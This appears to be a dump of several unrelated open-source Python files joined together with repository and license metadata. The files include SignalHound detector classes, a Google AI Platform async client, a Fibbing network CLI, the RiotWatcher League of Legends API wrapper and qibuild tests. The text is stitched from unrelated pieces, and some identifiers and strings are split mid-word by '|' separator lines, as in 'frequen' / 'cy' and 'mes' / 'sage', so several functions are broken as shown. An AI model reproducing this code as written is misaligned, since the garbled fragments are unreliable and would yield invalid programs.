TestSeqPoolSqrtCase.__name__ = cls_name_sqrt
globals()[cls_name_avg] = TestSeqPoolAvgCase
globals()[cls_name_sqrt] = TestSeqPoolSqrtCase
create_test_avg_sqrt_class(TestFusionSeqPoolCVMConcatOp)
create_test_avg_sqrt_class(TestFusionSeqPoolCVMConcatOpCase1)
create_test_avg_sqrt_class(TestFusionSeqPoolCVMConcatOpCase2)
create_test_avg_sqrt_class(TestFusionSeqPoolCVMConcatOpCase3)
create_test_avg_sqrt_class(TestFusionSeqPoolCVMConcatOpCase4)
if __name__ == '__main__':
unittest.main()
|
DiCarloLab-Delft/PycQED_py3
|
pycqed/measurement/det_fncs/hard/SignalHound.py
|
Python
|
mit
| 5,908
| 0.000508
|
"""
SignalHound related detector functions
extracted from pycqed/measurement/detector_functions.py commit 0da380ad2adf2dc998f5effef362cdf264b87948
"""
import logging
import time
from packaging import version
import qcodes as qc
from pycqed.measurement.det_fncs.Base import Soft_Detector, Hard_Detector
from pycqed.measurement.waveform_control import pulse
from pycqed.measurement.waveform_control import element
from pycqed.measurement.waveform_control import sequence
# import instruments for type annotations
from pycqed.instrument_drivers.physical_instruments.USB_SA124B import SignalHound_USB_SA124B
log = logging.getLogger(__name__)
class Signal_Hound_fixed_frequency(Soft_Detector):
def __init__(
self,
signal_hound: SignalHound_USB_SA124B,
frequency=None,
Navg=1,
delay=0.1,
prepare_for_each_point=False,
prepare_function=None,
prepare_function_kwargs: dict = {}
):
super().__init__()
self.frequency = frequency
self.name = 'SignalHound_fixed_frequency'
self.value_names = ['Power']
self.value_units = ['dBm']
self.delay = delay
self.SH = signal_hound
if frequency is not None:
self.SH.frequency(frequency)
self.Navg = Navg
self.prepare_for_each_point = prepare_for_each_point
self.prepare_function = prepare_function
self.prepare_function_kwargs = prepare_function_kwargs
def acquire_data_point(self, **kw):
if self.prepare_for_each_point:
self.prepare()
time.sleep(self.delay)
if version.parse(qc.__version__) < version.parse('0.1.11'):
return self.SH.get_power_at_freq(Navg=self.Navg)
else:
self.SH.avg(self.Navg)
return self.SH.power()
def prepare(self, **kw):
if version.parse(qc.__version__) < version.parse('0.1.11'):
self.SH.prepare_for_measurement()
if self.prepare_function is not None:
self.prepare_function(**self.prepare_function_kwargs)
def finish(self, **kw):
self.SH.abort()
class Signal_Hound_sweeped_frequency(Hard_Detector):
def __init__(
self,
signal_hound: SignalHound_USB_SA124B,
Navg=1,
delay=0.1,
**kw
):
super().__init__()
self.name = 'SignalHound_fixed_frequency'
self.value_names = ['Power']
self.value_units = ['dBm']
self.delay = delay
self.SH = signal_hound
self.Navg = Navg
def acquire_data_point(self, **kw):
frequency = self.swp.pop()
self.SH.set('frequen
|
cy', frequency)
self.SH.prepare_for_measurement()
time.sleep(self.delay)
return self.SH.get_power_at_freq(Navg=self.Navg)
def get_values(self):
return ([self.a
|
cquire_data_point()])
def prepare(self, sweep_points):
self.swp = list(sweep_points)
# self.SH.prepare_for_measurement()
def finish(self, **kw):
self.SH.abort()
class SH_mixer_skewness_det(Soft_Detector):
'''
Based on the "Signal_Hound_fixed_frequency" detector.
Generates an AWG sequence to measure sideband transmission
Inputs:
frequency (Hz)
QI_amp_ratio (parameter)
IQ_phase (parameter)
SH (instrument)
f_mod (Hz)
'''
def __init__(
self,
frequency,
QI_amp_ratio,
IQ_phase,
SH: SignalHound_USB_SA124B,
I_ch, Q_ch,
station,
Navg=1,
delay=0.1,
f_mod=10e6,
verbose=False,
**kw):
super(SH_mixer_skewness_det, self).__init__()
self.SH = SH
self.frequency = frequency
self.name = 'SignalHound_mixer_skewness_det'
self.value_names = ['Power']
self.value_units = ['dBm']
self.delay = delay
self.SH.frequency.set(frequency) # Accepts input in Hz
self.Navg = Navg
self.QI_amp_ratio = QI_amp_ratio
self.IQ_phase = IQ_phase
self.pulsar = station.pulsar
self.f_mod = f_mod
self.I_ch = I_ch
self.Q_ch = Q_ch
self.verbose = verbose
def acquire_data_point(self, **kw):
QI_ratio = self.QI_amp_ratio.get()
skewness = self.IQ_phase.get()
if self.verbose:
print('QI ratio: %.3f' % QI_ratio)
print('skewness: %.3f' % skewness)
self.generate_awg_seq(QI_ratio, skewness, self.f_mod)
self.pulsar.AWG.start()
time.sleep(self.delay)
return self.SH.get_power_at_freq(Navg=self.Navg)
def generate_awg_seq(self, QI_ratio, skewness, f_mod):
SSB_modulation_el = element.Element('SSB_modulation_el',
pulsar=self.pulsar)
cos_pulse = pulse.CosPulse(channel=self.I_ch, name='cos_pulse')
sin_pulse = pulse.CosPulse(channel=self.Q_ch, name='sin_pulse')
SSB_modulation_el.add(pulse.cp(cos_pulse, name='cos_pulse',
frequency=f_mod, amplitude=0.15,
length=1e-6, phase=0))
SSB_modulation_el.add(pulse.cp(sin_pulse, name='sin_pulse',
frequency=f_mod, amplitude=0.15 *
QI_ratio,
length=1e-6, phase=90 + skewness))
seq = sequence.Sequence('Sideband_modulation_seq')
seq.append(name='SSB_modulation_el', wfname='SSB_modulation_el',
trigger_wait=False)
self.pulsar.program_awgs(seq, SSB_modulation_el)
def prepare(self, **kw):
self.SH.prepare_for_measurement()
def finish(self, **kw):
self.SH.abort()
|
hiqdev/reppy
|
heppy/Error.py
|
Python
|
bsd-3-clause
| 580
| 0.010345
|
import logging
class Error(Exception):
def __init__(self, message, data = {}):
|
self.message = message
self.data = data
def __str__(self):
return self.message + ": " + repr(self.data)
@staticmethod
def die(code, error, message = None):
if isinstance(error, Exception):
e = error
error = '{0}.{1}'.format(type(e).__module__, type(e).__name__)
message = str(e)
print 'Error: ' + error
if message:
print mes
|
sage
#logging.exception(message)
exit(code)
|
googleapis/python-aiplatform
|
google/cloud/aiplatform_v1/services/specialist_pool_service/async_client.py
|
Python
|
apache-2.0
| 34,518
| 0.001477
|
# -*- coding: utf-8 -*-
# Copyright 2022 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from collections import OrderedDict
import functools
import re
from typing import Dict, Optional, Sequence, Tuple, Type, Union
import pkg_resources
from google.api_core.client_options import ClientOptions
from google.api_core import exceptions as core_exceptions
from google.api_core import gapic_v1
from google.api_core import retry as retries
from google.auth import credentials as ga_credentials # type: ignore
from google.oauth2 import service_account # type: ignore
try:
OptionalRetry = Union[retries.Retry, gapic_v1.method._MethodDefault]
except AttributeError: # pragma: NO COVER
OptionalRetry = Union[retries.Retry, object] # type: ignore
from google.api_core import operation as gac_operation # type: ignore
from google.api_core import operation_async # type: ignore
from google.cloud.aiplatform_v1.services.specialist_pool_service import pagers
from google.cloud.aiplatform_v1.types import operation as gca_operation
from google.cloud.aiplatform_v1.types import specialist_pool
from google.cloud.aiplatform_v1.types import specialist_pool as gca_specialist_pool
from google.cloud.aiplatform_v1.types import specialist_pool_service
from google.protobuf import empty_pb2 # type: ignore
from google.protobuf import field_mask_pb2 # type: ignore
from .transports.base import SpecialistPoolServiceTransport, DEFAULT_CLIENT_INFO
from .transports.grpc_asyncio import SpecialistPoolServiceGrpcAsyncIOTransport
from .client import SpecialistPoolServiceClient
class SpecialistPoolServiceAsyncClient:
"""A service for creating and managing Customer SpecialistPools.
When customers start Data Labeling jobs, they can reuse/create
Specialist Pools to bring their own Specialists to label the
data. Customers can add/remove Managers for the Specialist Pool
on Cloud console, then Managers will get email notifications to
manage Specialists and tasks on CrowdCompute console.
"""
_client: SpecialistPoolServiceClient
DEFAULT_ENDPOINT = SpecialistPoolServiceClient.DEFAULT_ENDPOINT
DEFAULT_MTLS_ENDPOINT = SpecialistPoolServiceClient.DEFAULT_MTLS_ENDPOINT
specialist_pool_path = staticmethod(
SpecialistPoolServiceClient.specialist_pool_path
)
parse_specialist_pool_path = staticmethod(
SpecialistPoolServiceClient.parse_specialist_pool_path
)
common_billing_account_path = staticmethod(
SpecialistPoolServiceClient.common_billing_account_path
)
parse_common_billing_account_path = staticmethod(
SpecialistPoolServiceClient.parse_common_billing_account_path
)
common_folder_path = staticmethod(SpecialistPoolServiceClient.common_folder_path)
parse_common_folder_path = staticmethod(
SpecialistPoolServiceClient.parse_common_folder_path
)
common_organization_path = staticmethod(
SpecialistPoolServiceClient.common_organization_path
)
parse_common_organization_path = staticmethod(
SpecialistPoolServiceClient.parse_common_organization_path
)
common_project_path = staticmethod(SpecialistPoolServiceClient.common_project_path)
parse_common_project_path = staticmethod(
SpecialistPoolServiceClient.parse_common_project_path
)
common_location_path = staticmethod(
SpecialistPoolServiceClient.common_location_path
)
parse_common_location_path = staticmethod(
SpecialistPoolServiceClient.parse_common_location_path
)
@classmethod
def from_service_account_info(cls, info: dict, *args, **kwargs):
"""Creates an instance of this client using the provided credentials
info.
Args:
info (dict): The service account private key info.
args: Additional arguments to pass to the constructor.
kwargs: Additional arguments to pass to the constructor.
Returns:
SpecialistPoolServiceAsyncClient: The constructed client.
"""
return SpecialistPoolServiceClient.from_service_account_info.__func__(SpecialistPoolServiceAsyncClient, info, *args, **kwargs) # type: ignore
@classmethod
def from_service_account_file(cls, filename: str, *args, **kwargs):
"""Creates an instance of this client using the provided credentials
file.
Args:
filename (str): The path to the service account private key json
file.
args: Additional arguments to pass to the constructor.
kwargs: Add
|
itional arguments to pa
|
ss to the constructor.
Returns:
SpecialistPoolServiceAsyncClient: The constructed client.
"""
return SpecialistPoolServiceClient.from_service_account_file.__func__(SpecialistPoolServiceAsyncClient, filename, *args, **kwargs) # type: ignore
from_service_account_json = from_service_account_file
@classmethod
def get_mtls_endpoint_and_cert_source(
cls, client_options: Optional[ClientOptions] = None
):
"""Return the API endpoint and client cert source for mutual TLS.
The client cert source is determined in the following order:
(1) if `GOOGLE_API_USE_CLIENT_CERTIFICATE` environment variable is not "true", the
client cert source is None.
(2) if `client_options.client_cert_source` is provided, use the provided one; if the
default client cert source exists, use the default one; otherwise the client cert
source is None.
The API endpoint is determined in the following order:
(1) if `client_options.api_endpoint` is provided, use the provided one.
(2) if `GOOGLE_API_USE_CLIENT_CERTIFICATE` environment variable is "always", use the
default mTLS endpoint; if the environment variable is "never", use the default API
endpoint; otherwise if client cert source exists, use the default mTLS endpoint, otherwise
use the default API endpoint.
More details can be found at https://google.aip.dev/auth/4114.
Args:
client_options (google.api_core.client_options.ClientOptions): Custom options for the
client. Only the `api_endpoint` and `client_cert_source` properties may be used
in this method.
Returns:
Tuple[str, Callable[[], Tuple[bytes, bytes]]]: returns the API endpoint and the
client cert source to use.
Raises:
google.auth.exceptions.MutualTLSChannelError: If any errors happen.
"""
return SpecialistPoolServiceClient.get_mtls_endpoint_and_cert_source(client_options) # type: ignore
@property
def transport(self) -> SpecialistPoolServiceTransport:
"""Returns the transport used by the client instance.
Returns:
SpecialistPoolServiceTransport: The transport used by the client instance.
"""
return self._client.transport
get_transport_class = functools.partial(
type(SpecialistPoolServiceClient).get_transport_class,
type(SpecialistPoolServiceClient),
)
def __init__(
self,
*,
credentials: ga_credentials.Credentials = None,
transport: Union[str, SpecialistPoolServiceTransport] = "grpc_asyncio",
client_options: ClientOptions = None,
client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,
) -> None:
"""Instantiates the specialist pool service client.
Args:
credentials (Optional[google.auth.credentials.Credentials]): The
authorization credentials to attach to requests. These
|
lferran/FibbingNode
|
fibbingnode/southbound/main.py
|
Python
|
gpl-2.0
| 7,223
| 0
|
from ConfigParser import DEFAULTSECT
from cmd import Cmd
import logging
import sys
import subprocess
import argparse
import datetime
from fibbing import FibbingManager
import fibbingnode
from fibbingnode.misc.utils import dump_threads
import signal
log = fibbingnode.log
CFG = fibbingnode.CFG
class FibbingCLI(Cmd):
Cmd.prompt = '> '
def __init__(self, mngr, *args, **kwargs):
self.fibbing = mngr
Cmd.__init__(self, *args, **kwargs)
def do_add_node(self, line=''):
"""Add a new fibbing node"""
self.fibbing.add_node()
def do_show_lsdb(self, line=''):
log.info(self.fibbing.root.lsdb)
def do_draw_network(self, line):
"""Draw the network as pdf in the given file"""
self.fibbing.root.lsdb.graph.draw(line)
def do_print_graph(self, line=''):
log.info('Current network graph: %s',
self.fibbing.root.lsdb.graph.edges(data=True))
def do_print_net(self, line=''):
"""Print information about the fibbing network"""
self.fibbing.print_net()
def do_print_routes(self, line=''):
"""Print information about the fibbing routes"""
self.fibbing.print_routes()
def do_exit(self, line=''):
"""Exit the prompt"""
return True
def do_cfg(self, line=''):
part = line.split(' ')
val = part.pop()
key = part.pop()
sect = part.pop() if part else DEFAULTSECT
CFG.set(sect, key, val)
def do_call(self, line):
"""Execute a command on a node"""
items = line.split(' ')
try:
node = self.fibbing[items[0]]
node.call(*items[1:])
except KeyError:
log.error('Unknown node %s', items[0])
def do_add_route(self, line=''):
"""Setup a fibbing route
add_route network via1 metric1 via2 metric2 ..."""
items = line.split(' ')
if len(items) < 3:
log.error('add_route takes at least 3 arguments: '
'network via_address metric')
else:
points = []
i = 2
while i < len(items):
points.append((items[i-1], items[i]))
i += 2
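# e.g. for the command 'add_route 10.0.0.0/24 192.168.1.1 5 192.168.1.2 10'
# (hypothetical network and via addresses), points becomes
# [('192.168.1.1', '5'), ('192.168.1.2', '10')].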
log.critical('Add route request at %s',
datetime.datetime.now().strftime('%H.%M.%S.%f'))
self.fibbing.install_route(items[0], points, True)
def do_rm_route(self, line):
"""Remove a route or parts of a route"""
items = line.split(' ')
if len(items) == 1:
ans = raw_input('Remove the WHOLE fibbing route for %s ? (y/N)'
% line)
if ans == 'y':
self.fibbing.remove_route(line)
else:
self.fibbing.remove_route_part(items[0], *items[1:])
def default(self, line):
"""Pass the command to the shell"""
args = line.split(' ')
if args[0] in self.fibbing.nodes:
self.do_call(' '.join(args))
else:
try:
log.info(subprocess.check_output(line, shell=True))
except Exception as e:
log.info('Command %s failed', line)
log.info(e.message)
def eval(self, line):
"""Interpret the given line ..."""
self.eval(line)
def do_ospfd(self, line):
"""Connect to the ospfd daemon of the given node"""
try:
self.fibbing[line].call('telnet', 'localhost', '2604')
except KeyError:
log.error('Unknown node %s', line)
def do_vtysh(self, line):
"""Execute a vtysh command on a node"""
items = line.split(' ')
try:
node = self.fibbing[items[0]]
result = node.vtysh(*items[1:], configure=False)
log.info(result)
except KeyError:
log.error('Unknown node %s', items[0])
def do_configure(self, line):
"""Execute a vtysh configure command on a node"""
items = line.split(' ')
try:
node = self.fibbing[items[0]]
result = node.vtysh(*items[1:], configure=True)
result = result.strip(' \n\t')
if result:
log.info(result)
except KeyError:
log.error('Unknown node %s', items[0])
def do_traceroute(self, line, max_ttl=10):
"""
Perform a simple traceroute between the source and an IP
:param max_ttl: the maximal ttl to use
"""
items = line.split(' ')
try:
node = self.fibbing[items[0]]
node.call('traceroute', '-q', '1', '-I',
'-m', str(max_ttl), '-w', '.1', items[1])
except KeyError:
log.error('Unknown node %s', items[0])
except ValueError:
log.error('This command takes 2 arguments: '
'source node and destination IP')
def do_dump(self, line=''):
dump_threads()
def handle_args():
parser = argparse.ArgumentParser(description='Starts a fibbing node.')
parser.add_argument('ports', metavar='IF', type=str, nargs='*',
help='A physical interface to use')
parser.add_argument('--debug', action='store_true', default=False,
help='Debug (default: disabled)')
parser.add_argument('--nocli', action='store_true', default=False,
help='Disable the CLI')
parser.add_argument('--cfg', help='Use specified config file',
default=None)
args = parser.parse_args()
instance_count = CFG.getint(DEFAULTSECT, 'controller_instance_number')
# Update default config
if args.cfg:
CFG.read(args.cfg)
fibbingnode.BIN = CFG.get(DEFAULTSECT, 'quagga_path')
# Check if we need to force debug mode
if args.debug:
CFG.set(DEFAULTSECT, 'debug', '1')
if CFG.getboolean(DEFAULTSECT, 'debug'):
|
log.setLevel(logging.DEBUG)
else:
log.setLevel(logging.INFO)
# Check for any specified physical port to use both in config file
# or in args
ports = set(p for p in CFG.sections()
|
if not (p == 'fake' or p == 'physical' or p == DEFAULTSECT))
ports.update(args.ports)
if not ports:
log.warning('The fibbing node will not be connected '
'to any physical ports!')
else:
log.info('Using the physical ports: %s', ports)
return ports, instance_count, not args.nocli
def main(_CLI=FibbingCLI):
phys_ports, name, cli = handle_args()
if not cli:
fibbingnode.log_to_file('%s.log' % name)
mngr = FibbingManager(name)
def sig_handler(sig, frame):
mngr.cleanup()
fibbingnode.EXIT.set()
sys.exit()
signal.signal(signal.SIGINT, sig_handler)
signal.signal(signal.SIGTERM, sig_handler)
try:
mngr.start(phys_ports=phys_ports)
if cli:
cli = _CLI(mngr=mngr)
cli.cmdloop()
fibbingnode.EXIT.set()
except Exception as e:
log.exception(e)
fibbingnode.EXIT.set()
finally:
fibbingnode.EXIT.wait()
mngr.cleanup()
if __name__ == '__main__':
main()
|
gnozell/Yar-Ha-Har
|
lib/riotwatcher/riotwatcher.py
|
Python
|
mit
| 22,700
| 0.00163
|
from collections import deque
import time
import requests
# Constants
BRAZIL = 'br'
EUROPE_NORDIC_EAST = 'eune'
EUROPE_WEST = 'euw'
KOREA = 'kr'
LATIN_AMERICA_NORTH = 'lan'
LATIN_AMERICA_SOUTH = 'las'
NORTH_AMERICA = 'na'
OCEANIA = 'oce'
RUSSIA = 'ru'
TURKEY = 'tr'
# Platforms
platforms = {
BRAZIL: 'BR1',
EUROPE_NORDIC_EAST: 'EUN1',
EUROPE_WEST: 'EUW1',
KOREA: 'KR',
LATIN_AMERICA_NORTH: 'LA1',
LATIN_AMERICA_SOUTH: 'LA2',
NORTH_AMERICA: 'NA1',
OCEANIA: 'OC1',
RUSSIA: 'RU',
TURKEY: 'TR1'
}
queue_types = [
'CUSTOM', # Custom games
'NORMAL_5x5_BLIND', # Normal 5v5 blind pick
'BOT_5x5', # Historical Summoners Rift coop vs AI games
'BOT_5x5_INTRO', # Summoners Rift Intro bots
'BOT_5x5_BEGINNER', # Summoner's Rift Coop vs AI Beginner Bot games
'BOT_5x5_INTERMEDIATE', # Historical Summoner's Rift Coop vs AI Intermediate Bot games
'NORMAL_3x3', # Normal 3v3 games
'NORMAL_5x5_DRAFT', # Normal 5v5 Draft Pick games
'ODIN_5x5_BLIND', # Dominion 5v5 Blind Pick games
'ODIN_5x5_DRAFT', # Dominion 5v5 Draft Pick games
'BOT_ODIN_5x5', # Dominion Coop vs AI games
'RANKED_SOLO_5x5', # Ranked Solo 5v5 games
'RANKED_PREMADE_3x3', # Ranked Premade 3v3 games
'RANKED_PREMADE_5x5', # Ranked Premade 5v5 games
'RANKED_TEAM_3x3', # Ranked Team 3v3 games
'RANKED_TEAM_5x5', # Ranked Team 5v5 games
'BOT_TT_3x3', # Twisted Treeline Coop vs AI games
'GROUP_FINDER_5x5', # Team Builder games
'ARAM_5x5', # ARAM games
'ONEFORALL_5x5', # One for All games
'FIRSTBLOOD_1x1', # Snowdown Showdown 1v1 games
'FIRSTBLOOD_2x2', # Snowdown Showdown 2v2 games
'SR_6x6', # Hexakill games
'URF_5x5', # Ultra Rapid Fire games
'BOT_URF_5x5', # Ultra Rapid Fire games played against AI games
'NIGHTMARE_BOT_5x5_RANK1', # Doom Bots Rank 1 games
'NIGHTMARE_BOT_5x5_RANK2', # Doom Bots Rank 2 games
'NIGHTMARE_BOT_5x5_RANK5', # Doom Bots Rank 5 games
'ASCENSION_5x5', # Ascension games
'HEXAKILL', # 6v6 games on twisted treeline
'KING_PORO_5x5', # King Poro game games
'COUNTER_PICK', # Nemesis games,
'BILGEWATER_5x5', # Black Market Brawlers games
]
game_maps = [
{'map_id': 1, 'name': "Summoner's Rift", 'notes': "Summer Variant"},
{'map_id': 2, 'name': "Summoner's Rift", 'notes': "Autumn Variant"},
{'map_id': 3, 'name': "The Proving Grounds", 'notes': "Tutorial Map"},
{'map_id': 4, 'name': "Twisted Treeline", 'notes': "Original Version"},
{'map_id': 8, 'name': "The Crystal Scar", 'notes': "Dominion Map"},
{'map_id': 10, 'name': "Twisted Treeline", 'notes': "Current Version"},
{'map_id': 11, 'name': "Summoner's Rift", 'notes': "Current Version"},
{'map_id': 12, 'name': "Howling Abyss", 'notes': "ARAM Map"},
{'map_id': 14, 'name': "Butcher's Bridge", 'notes': "ARAM Map"},
]
game_modes = [
'CLASSIC', # Classic Summoner's Rift and Twisted Treeline games
'ODIN', # Dominion/Crystal Scar games
'ARAM', # ARAM games
'TUTORIAL', # Tutorial games
'ONEFORALL', # One for All games
'ASCENSION', # Ascension games
'FIRSTBLOOD', # Snowdown Showdown games
'KINGPORO', # King Poro games
]
game_types = [
'CUSTOM_GAME', # Custom games
'TUTORIAL_GAME', # Tutorial games
'MATCHED_GAME', # All other games
]
sub_types = [
'NONE', # Custom games
'NORMAL', # Summoner's Rift unranked games
'NORMAL_3x3', # Twisted Treeline unranked games
'ODIN_UNRANKED', # Dominion/Crystal Scar games
'ARAM_UNRANKED_5v5', # ARAM / Howling Abyss games
'BOT', # Summoner's Rift and Crystal Scar games played against AI
'BOT_3x3', # Twisted Treeline games played against AI
'RANKED_SOLO_5x5', # Summoner's Rift ranked solo queue games
'RANKED_TEAM_3x3', # Twisted Treeline ranked team games
'RANKED_TEAM_5x5', # Summoner's Rift ranked team games
'ONEFORALL_5x5', # One for All games
'FIRSTBLOOD_1x1', # Snowdown Showdown 1x1 games
'FIRSTBLOOD_2x2', # Snowdown Showdown 2x2 games
'SR_6x6', # Hexakill games
'CAP_5x5', # Team Builder games
'URF', # Ultra Rapid Fire games
'URF_BOT', # Ultra Rapid Fire games against AI
'NIGHTMARE_BOT', # Nightmare bots
'ASCENSION', # Ascension games
'HEXAKILL', # Twisted Treeline 6x6 Hexakill
'KING_PORO', # King Poro games
'COUNTER_PICK', # Nemesis games
'BILGEWATER', # Black Market Brawlers games
]
player_stat_summary_types = [
'Unranked', # Summoner's Rift unranked games
'Unranked3x3', # Twisted Treeline unranked games
'OdinUnranked', # Dominion/Crystal Scar games
'AramUnranked5x5', # ARAM / Howling Abyss games
'CoopVsAI', # Summoner's Rift and Crystal Scar games played against AI
'CoopVsAI3x3', # Twisted Treeline games played against AI
'RankedSolo5x5', # Summoner's Rift ranked solo queue games
'RankedTeams3x3', # Twisted Treeline ranked team games
'RankedTeams5x5', # Summoner's Rift ranked team games
'OneForAll5x5', # One for All games
'FirstBlood1x1', # Snowdown Showdown 1x1 games
'FirstBlood2x2', # Snowdown Showdown 2x2 games
'SummonersRift6x6', # Hexakill games
'CAP5x5', # Team Builder games
'URF', # Ultra Rapid Fire games
'URFBots', # Ultra Rapid Fire games played against AI
'NightmareBot', # Summoner's Rift games played against Nightmare AI
'Hexakill', # Twisted Treeline 6x6 Hexakill games
'KingPoro', # King Poro games
'CounterPick', # Nemesis games
'Bilgewater', # Black Market Brawlers games
]
solo_queue, ranked_5s, ranked_3s = 'RANKED_SOLO_5x5', 'RANKED_TEAM_5x5', 'RANKED_TEAM_3x3'
api_versions = {
'champion': 1.2,
'current-game': 1.0,
'featured-games': 1.0,
'game': 1.3,
'league': 2.5,
'lol-static-data': 1.2,
'lol-status': 1.0,
'match': 2.2,
'matchhistory': 2.2,
'matchlist': 2.2,
'stats': 1.3,
'summoner': 1.4,
'team': 2.4
}
class LoLException(Exception):
def __init__(self, error, response):
self.error = error
self.response = response
def __str__(self):
return self.error
error_400 = "Bad request"
error_401 = "Unauthorized"
error_404 = "Game data not found"
error_429 = "Too many requests"
error_500 = "Internal server error"
error_503 = "Service unavailable"
def raise_status(response):
if response.status_code == 400:
raise LoLException(error_400, response)
elif response.status_code == 401:
raise LoLException(error_401, response)
elif response.status_code == 404:
raise LoLException(error_404, response)
elif response.status_code == 429:
raise LoLException(error_429, response)
elif response.status_code == 500:
raise LoLException(error_500, response)
elif response.status_code == 503:
raise LoLException(error_503, response)
else:
response.raise_for_status()
class RateLimit:
def __init__(self, allowed_requests, seconds):
self.allowed_requests = allow
|
ed_requests
self.seconds = seconds
self.made_requests = deque()
def __reload(self):
t = time.time()
while len(self.made_requests) > 0 and self.made_requests[0] < t:
self.made_request
|
s.popleft()
def add_request(self):
self.made_requests.append(time.time() + self.seconds)
def request_available(self):
self.__reload()
return len(self.made_requests) < self.allowed_requests
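# A minimal usage sketch (not part of the original module): RateLimit is a
# sliding window; add_request() records when a request will expire,
# __reload() drops expired entries, and request_available() reports whether
# the window still has room, e.g.:
#
#   limit = RateLimit(10, 10)  # at most 10 requests per 10 seconds
#   if limit.request_available():
#       limit.add_request()
#       # ... perform the API call ...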
class RiotWatcher:
def __init__(self, key, default_region=NORTH_AMERICA, limits=(RateLimit(10, 10), RateLimit(500, 600), )):
self.key = key
self.default_region = default_region
self.limits = limits
def can_make_request(self):
for lim in self.limits:
if not lim.request_available():
return False
return True
def base_request(self, url, region, static=False, **kwargs):
if region is None:
region = self.default_region
args = {'api_key': self.key}
for k in kwargs:
if kwargs[k] is not None:
|
aldebaran/qibuild
|
python/qibuild/test/test_qibuild_find.py
|
Python
|
bsd-3-clause
| 3,244
| 0.000308
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (c) 2012-2021 SoftBank Robotics. All rights reserved.
# Use of this source code is governed by a BSD-style license (see the COPYING file).
""" Test QiBuild Find """
from __future__ import absolute_import
from __future__ import unicode_literals
from __future__ import print_function
import qibuild.config
from qibuild import find
from qibuild.test.conftest import QiBuildAction
from qitoolchain.test.conftest import QiToolchainAction
def test_find_target_in_project_cmake(qibuild_action, record_messages):
""" Test Find Target In Project CMake """
qibuild_action.add_test_project("world")
qibuild_action.add_test_project("hello")
qibuild_action("configure", "hello")
record_messages.reset()
qibuild_action("find", "--cmake", "hello", "world")
assert record_messages.find("WORLD_LIBRARIES")
def test_find_target_in_toolchain_package_cmake(cd_to_tmpdir, record_messages):
""" Test Find Target In Toolchain Package CMake """
qibuild_action = QiBuildAction()
qitoolchain_action = QiToolchainAction()
build_worktree = qibuild_action.build_worktree
qibuild_action.add_test_project("world")
qibuild_action.add_test_project("hello")
world_package = qibuild_action("package", "world")
qitoolchain_action("create", "foo")
qibuild.config.add_build_config("foo", toolchain="foo")
qitoolchain_action("add-package", "-c", "foo", world_package)
build_worktree.worktree.remove_project("world", from_disk=True)
record_messages.reset()
qibuild_action.chdir("hello")
qibuild_action("configure", "-c", "foo")
qibuild_action("find", "--cmake", "world", "-c", "foo")
assert record_messages.find("WORLD_LIBRARIES")
def test_f
|
ind_target_in_build_dir(qibuild_action, record_messages):
""" Test Find Target In Build Dir """
qibuild_action.add_test_project("world")
qibuild_action.add_test_project("hello")
qibuild_action("configure", "hello")
qibuild_action("make", "hello")
record_messages.reset()
qibuild_action("find", "hello", "world")
assert record_messages.find(find.libr
|
ary_name("world"))
rc = qibuild_action("find", "hello", "libworld", retcode=True)
assert rc == 1
def test_find_target_in_toolchain_package(cd_to_tmpdir, record_messages):
""" Test Find Target In Toolchain Package """
qibuild_action = QiBuildAction()
qitoolchain_action = QiToolchainAction()
qibuild_action.add_test_project("world")
qibuild_action.add_test_project("hello")
world_package = qibuild_action("package", "world")
qitoolchain_action("create", "foo")
qibuild.config.add_build_config("foo", toolchain="foo")
qitoolchain_action("add-package", "-c", "foo", world_package)
qibuild_action.chdir("hello")
qibuild_action("configure", "-c", "foo")
qibuild_action("make", "-c", "foo")
record_messages.reset()
qibuild_action("find", "world", "-c", "foo")
assert record_messages.find(find.library_name("world"))
record_messages.reset()
qibuild_action("find", "hello", "-c", "foo")
assert record_messages.find(find.binary_name("hello"))
rc = qibuild_action("find", "libeggs", "-c", "foo", retcode=True)
assert rc == 1
|
brutalic/pynet_brutal
|
class2/GetSysNameDesc.py
|
Python
|
apache-2.0
| 1,227
| 0.007335
|
#!/usr/bin/python
import getpass
import snmp_helper
from snmp_helper import snmp_get_oid,snmp_extract
import yaml
DeviceIp1 = '184.105.247.70'
DeviceIp2 = '184.105.247.71'
SnmpPort = 161
sysNameOID = '.1.3.6.1.2.1.1.5.0'
sysDescOID = '.1.3.6.1.2.1.1.1.0'
#Connecting to the devices, using methods from getpass library
DeviceIp1 = raw_input("pynet-rtr1 IP address: ")
DeviceIp2 = raw_input("pynet-rtr2 IP address: ")
SnmpString = getpass.getpass(prompt="Community string: ")
#Creating a tuple for each device, consisting of the IP, SNMP string and SNMP port
SnmpDevice1 = (DeviceIp1, SnmpString, SnmpPort)
SnmpDevice2 = (DeviceIp2, SnmpString, SnmpPort)
#Creating a loop to cycle through each device's information, using the snmp_helper library methods
for SnmpDevices in (SnmpDevice1, SnmpDevice2):
for OIDs in (sysNameOID, sysDescOID):
SnmpInformation = snmp_get_oid(SnmpDevices, oid=OIDs)
SnmpDescOutput = snmp_extract(SnmpInformation)
#Printing results to a yaml file
SmpFileOutput = 'SnmpInformation.txt'
with open(SmpFileOutput, "a") as f:
f.write(yaml.safe_dump(SnmpDescOutput, default_flow_style=False))
print "\nResults printed to a yaml file.\n"
|
SebDieBln/QGIS
|
python/plugins/db_manager/db_plugins/oracle/plugin.py
|
Python
|
gpl-2.0
| 22,853
| 0.000131
|
# -*- coding: utf-8 -*-
"""
/***************************************************************************
Name : DB Manager
Description : Database manager plugin for QGIS (Oracle)
Date : Aug 27, 2014
copyright : (C) 2014 by Médéric RIBREUX
email : [email protected]
The content of this file is based on
- PG_Manager by Martin Dobias <[email protected]> (GPLv2 license)
- DB Manager by Giuseppe Sucameli <[email protected]> (GPLv2 license)
***************************************************************************/
/***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************/
"""
# this will disable the dbplugin if the connector raise an ImportError
from .connector import OracleDBConnector
from PyQt4.QtCore import *
